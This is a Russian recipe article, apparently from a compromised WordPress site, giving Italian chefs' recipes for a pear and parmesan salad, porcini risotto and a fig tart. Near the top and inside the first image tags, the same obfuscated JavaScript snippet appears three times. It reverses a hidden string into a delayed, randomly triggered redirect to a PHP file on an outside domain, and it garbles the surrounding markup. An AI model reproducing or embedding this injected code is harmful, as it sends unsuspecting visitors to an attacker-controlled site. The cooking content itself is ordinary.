3 полезных и несложных рецепта от итальянских шеф-поваров

Шеф-повара итальянской ярмарки Mercatino Regionale: Food & Art, которая пройдёт в Москве уже на этой неделе, поделились с нами рецептами классических блюд с Апеннинского полуострова. Расскажем, как приготовить на обед салат с грушей и пармезаном, ризотто с белыми грибами и осенний пирог с инжиром.

374 calories

$NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}to-prigotovit-s-grushami-5-osennih-receptov-im-8.jpg»> $NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}to-prigotovit-s-grushami-5-osennih-receptov-im-8.jpg»>

Салат с грушей и пармезаном

Легендарный итальянский пармезан или овечий сыр пекорино отлично сочетаются с грушами, причём как со свежими, так и с поджаренными на гриле. Добавьте свежую зелень, немного орехов и фиников и приготовьте этот традиционный осенний салат.

$NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}to-prigotovit-s-grushami-5-osennih-receptov-im-8.jpg» class=»c2″ alt=»Изображение рецепта Салат с грушей и пармезаном» title=»Изображение рецепта Салат с грушей и пармезаном»>

Салат с грушей и пармезаном

СЛОЖНОСТЬ РЕЦЕПТА:

ВРЕМЯ ПРИГОТОВЛЕНИЯ:

15 минут

КОЛИЧЕСТВО ПОРЦИЙ:

6 порций

КАЛОРИЙНОСТЬ:

374 ккал

Сложность

Время

15 минут

Кол-во порций

6 порций

Калорийность

374 ккал

Ингредиенты

Груша

2 шт.

Сыр (пармезан или пекорино)

100 г

Салат (кресс и руккола)

350—400 г

Финики

12 шт.

Орехи (грецкие)

6 шт.

Лимон

¼ шт.

Масло (оливковое)

½ стакана

Уксус (бальзамический)

1 ч. л.

Процесс приготовления

  1. Кресс-салат смешайте с рукколой и разложите по тарелкам — это будет подложка для салата.
  2. Груши нарежьте тонкими ломтиками и, чтобы они сохранили свой цвет и не потемнели, сбрызните соком лимона. Выложите на листья салата.
  3. Финики начините грецкими орехами (по половинке ореха в каждый финик). Разложите поверх груш по паре штук в каждую порцию.
  4. Для заправки смешайте оливковое масло с бальзамическим уксусом. Полейте салат и посыпьте сверху очень тонкой сырной стружкой.

560 calories

Ризотто с белыми грибами и сливками

Осенью на Апеннинах начинается сезон «смиренной охоты»: итальянцы собирают белые грибы и трюфели, из которых затем готовят вкусные ароматные блюда.   Главный секрет правильного ризотто — круглый, богатый крахмалом рис, который развариваясь приобретает кремообразную консистенцию. Есть несколько сортов, которые считаются наиболее подходящими: арборио, бальдо, падано, рома, виалоне нано, марателли или карнароли.

Изображение рецепта Ризотто с белыми грибами и сливками

Ризотто с белыми грибами и сливками

СЛОЖНОСТЬ РЕЦЕПТА:

ВРЕМЯ ПРИГОТОВЛЕНИЯ:

30 минут

КОЛИЧЕСТВО ПОРЦИЙ:

6 порций

КАЛОРИЙНОСТЬ:

560 ккал

Сложность

Время

30 минут

Кол-во порций

6 порций

Калорийность

560 ккал

Ингредиенты

Рис (карнароли)

500 г

Грибы (белые свежие)

500 г

Лук (репчатый)

1 шт.

Чеснок

4 зубчика

Сливки (20% жирности)

100 мл

Сыр (пармезан)

50 г

Бульон (куриный)

1,5 л

Вино (белое сухое)

200 мл

Масло (сливочное)

50 г

Масло (оливковое)

50 мл

Соль

по вкусу

Процесс приготовления

  1. Мелко нарежьте лук и чеснок. Разогрейте в глубокой сковороде или кастрюле с толстым дном оливковое масло вместе с кусочком сливочного. Пассеруйте лук до прозрачности. Затем засыпьте рис и готовьте помешивая несколько минут. Добавьте чеснок и снова хорошо перемешайте.
  2. Теперь пришла очередь грибов. Добавьте их к рису и готовьте 2—4 минуты помешивая.
  3. Налейте в ризотто белое сухое вино и продолжайте помешивать — это надо делать непрерывно. Через несколько минут можно вливать куриный бульон. Но добавлять его следует небольшими дозами: два половника сначала и по одному — по мере испарения жидкости. Держите бульон на очень медленном огне, чтобы он оставался горячим, почти кипел, но не бурлил.
  4. Готовьте ризотто 15 минут — к этому времени рис должен приобрести состояние аль денте. Попробуйте готовность и посолите по вкусу.
  5. Налейте сливки в отдельную посуду, мелко натрите в них сыр и перемешайте.
  6. Снимите ризотто с огня, добавьте сливочно-сырную смесь и хорошо перемешайте. Пусть немного постоит — и можно подавать к столу.

430 calories

Пирог с инжиром

Сентябрьский инжир — settembrini — считается самым вкусным. В Италии его обычно едят свежим или готовят из него конфитюры, десерты и сладкие пироги вроде этого.

Изображение рецепта Пирог с инжиром

Пирог с инжиром

СЛОЖНОСТЬ РЕЦЕПТА:

ВРЕМЯ ПРИГОТОВЛЕНИЯ:

40 минут

КОЛИЧЕСТВО ПОРЦИЙ:

8 порций

КАЛОРИЙНОСТЬ:

430 ккал

Сложность

Время

40 минут

Кол-во порций

8 порций

Калорийность

430 ккал

Ингредиенты

Инжир

8 шт.

Вино (херес)

2 стакана

Мука (пшеничная)

200 г

Масло (сливочное)

150 г

Миндаль (молотый)

100 г

Сахар

100 г

Процесс приготовления

  1. Нарежьте инжир толстыми дисками, уложите в плоскую форму и залейте бокалом хереса на ночь.
  2. Из всей муки и 100 граммов сливочного масла приготовьте рубленое тесто. Дайте ему постоять в холодильнике час.
  3. Затем раскатайте тесто в пласт толщиной 2—3 мм и разложите его на противне.
  4. Оставшееся сливочное масло разомните с сахаром, добавьте молотый миндаль и бокал хереса. Хорошо размешайте: у вас должна получиться довольно густая масса.
  5. Намажьте массу на тесто и разложите сверху инжир.
  6. Выпекайте пирог в духовке при температуре 200 градусов в течение 25 минут.

Статьи по теме

В Москве пройдёт ярмарка итальянских продуктов

3 вкуснейших рецепта прямиком из итальянской Тосканы

4 итальянских рецепта на обед

Как приготовить настоящий итальянский ужин: 4 простых рецепта

Оцените статью
Дежурная Качалка
Добавить комментарии

;-) :| :x :twisted: :smile: :shock: :sad: :roll: :razz: :oops: :o :mrgreen: :lol: :idea: :grin: :evil: :cry: :cool: :arrow: :???: :?: :!:

Adblock
detector